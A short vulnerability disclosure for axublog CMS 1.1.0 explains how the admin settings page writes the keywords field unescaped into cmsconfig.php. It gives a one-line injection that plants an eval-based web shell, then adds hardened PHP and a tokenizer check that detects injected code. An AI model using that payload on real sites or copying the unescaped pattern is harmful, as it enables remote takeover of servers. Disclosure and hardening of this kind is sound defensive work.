axublogcms1.1.0 the latest version Getshell
Code Execution Vulnerability, Backstage write configuration file.
You can download the latest version from here (pic.axublog.com/axublog1.1.0install.rar).
./ad/setconfig.php
The submitted parameter $webkeywords is substituted directly, without any escaping.
So, here we can write a sentence. As seen on line 97, the ../cmsconfig.php file is included directly, so whatever is written goes straight into the cmsconfig.php file.
Insert a sentence in the keywords field. Here we need to close the preceding webkeywords value and close the double quotation marks; otherwise the incomplete PHP file will not run.
For example, 123456 "; @eval ($_POST['a']); $a="
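An added example, not part of the original report and not axublog's own code: a safer way to write a PHP config file, with a check that the generated file contains only constant string assignments. The function names and the sample value are assumptions made for illustration; only the `$webkeywords` setting comes from the report.

```php
<?php
// Added example. Helper names are hypothetical; only $webkeywords comes from the report.

// Pattern the report describes: the value is pasted between double quotes in PHP source.
function render_config_unsafe(string $webkeywords): string
{
    return "<?php\n\$webkeywords=\"" . $webkeywords . "\";\n";
}

// Hardened form: var_export() emits a single-quoted PHP literal with ' and \ escaped,
// so the value cannot terminate the string and continue as code.
function render_config_safe(array $settings): string
{
    $out = "<?php\n";
    foreach ($settings as $name => $value) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name)) {
            throw new InvalidArgumentException("invalid setting name");
        }
        $out .= '$' . $name . ' = ' . var_export((string) $value, true) . ";\n";
    }
    return $out;
}

// Detection check: a generated config must tokenise to nothing but
// "$name = 'constant string';" statements. Anything else is rejected.
function is_plain_assignments(string $source): bool
{
    $allowed = [T_OPEN_TAG, T_WHITESPACE, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING];
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok) ? !in_array($tok[0], $allowed, true)
                           : ($tok !== '=' && $tok !== ';')) {
            return false;
        }
    }
    return true;
}

// Constructed sample value with the same quote-closing shape as the report's example.
$sample = 'news"; echo 1; $a="';

var_dump(is_plain_assignments(render_config_unsafe($sample)));
var_dump(is_plain_assignments(render_config_safe(['webkeywords' => $sample])));
```

Running the same token check over an existing cmsconfig.php is a quick way to see whether anything other than plain settings has been written into it. Storing settings as data (for example JSON read with `json_decode`) instead of an included PHP file removes this class of bug altogether.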